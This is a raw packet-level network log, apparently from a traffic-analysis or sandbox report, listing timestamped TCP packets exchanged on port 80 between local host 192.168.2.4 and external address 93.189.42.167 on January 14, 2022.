Jan 14, 2022 00:15:51.628514051 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.628585100 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.628601074 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679128885 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679155111 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679172993 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679183960 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679191113 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679208040 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679251909 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679272890 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679276943 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679332972 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679353952 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679379940 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679398060 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679415941 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679434061 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679435015 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679452896 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679457903 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679471016 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679488897 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679497004 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679507017 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679523945 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679524899 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679543972 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679563999 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679580927 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679590940 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679600000 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679613113 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679616928 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679635048 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679639101 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679675102 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679676056 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679699898 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679717064 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679733992 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679750919 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679752111 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679770947 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679775953 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679788113 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679807901 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679815054 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679825068 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679845095 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679862976 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679872036 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679881096 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679898977 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679907084 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679917097 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679930925 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.679933071 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679950953 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679966927 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.679970980 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.680011034 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.680227041 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680244923 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680262089 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680279016 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680279970 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.680311918 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680321932 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.680327892 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680356979 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.680373907 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680391073 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680409908 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680418015 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.680438995 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680457115 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680474997 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680490017 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.680491924 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680507898 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680537939 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.680552959 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680571079 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680588007 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680602074 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.680604935 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680624008 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680632114 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.680660009 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.680764914 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680783033 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680799007 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680815935 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680850983 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.680886030 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.680948019 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680965900 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.680985928 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681005955 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681016922 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.681024075 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681041002 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681054115 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.681067944 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681085110 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.681086063 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681104898 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681122065 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681138039 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.681142092 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681159019 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681166887 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.681175947 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681195021 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681207895 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.681210995 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681229115 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681235075 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.681288004 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.681868076 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681891918 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681909084 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681927919 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681942940 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681961060 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681961060 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.681978941 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.681997061 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682001114 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682015896 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682029963 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682034969 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682053089 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682058096 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682070017 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682081938 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682084084 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682101965 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682116032 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682126045 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682128906 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682147980 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682164907 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682164907 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682184935 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682193041 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682203054 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682219982 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682220936 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682236910 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682252884 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682261944 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682270050 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682286978 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682298899 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682305098 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682322025 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682341099 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682351112 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682356119 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682358027 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682374001 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682390928 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682390928 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682409048 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682425976 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682435036 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682444096 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682456017 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682462931 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682481050 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682492018 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682497978 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682516098 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682529926 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682533979 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682550907 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682559967 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682569027 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682586908 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682604074 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682610989 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682621002 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682638884 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682647943 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682657003 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682674885 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682678938 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682692051 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.682699919 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.682737112 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.700757980 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.729732037 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.729779959 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.729816914 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.729841948 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.729882956 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.729923964 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.729964972 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.729969025 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.729995966 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.730005026 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730045080 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730096102 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.730386972 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730429888 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730468988 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730475903 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.730509043 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730555058 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.730556011 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730597019 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730637074 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.730637074 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730674982 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730715990 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730726004 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.730755091 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730792999 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730798960 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.730832100 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730870962 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730874062 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.730911016 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730952024 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.730962038 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.730988979 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.731028080 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.731029987 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.731173038 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.731218100 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.731281996 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.731364965 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.731406927 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.731431007 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.731470108 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.731509924 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.731517076 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.731548071 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.731589079 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.731589079 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.731647015 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.731689930 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.731703997 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.731764078 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.731806040 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.731870890 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.731946945 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.731987000 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732033968 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.732094049 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732178926 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732201099 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.732240915 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732266903 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732291937 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732316017 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.732333899 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732361078 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.732378006 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732418060 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.732434988 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732511997 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732626915 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732641935 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.732687950 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732742071 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.732755899 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732795000 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732834101 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.732839108 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732887983 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732912064 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732933044 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.732950926 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.732990980 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733019114 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.733030081 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733067989 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733073950 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.733112097 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733155966 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733159065 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.733194113 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733232975 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733272076 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733283997 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.733310938 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733350992 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733359098 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.733390093 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733429909 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733432055 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.733468056 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733500004 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.733505964 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733547926 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733566046 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.733588934 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733628035 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733666897 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733679056 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.733705044 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733743906 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733751059 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.733783007 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733814001 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.733819962 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733867884 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.733885050 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733925104 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733962059 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.733968973 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.734009027 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.734070063 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.734132051 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.734210014 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.734250069 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.734276056 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.734311104 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.734359026 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.734427929 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.734483957 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.734533072 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.734572887 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.734586000 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.734610081 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.734649897 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.734661102 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.734692097 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.734715939 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.734807968 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.734888077 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.734925032 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.734946012 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.734985113 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.735009909 CET	49873	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:51.735025883 CET	80	49873	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:51.735064983 CET	80	49873	93.189.42.167	192.168.2.4
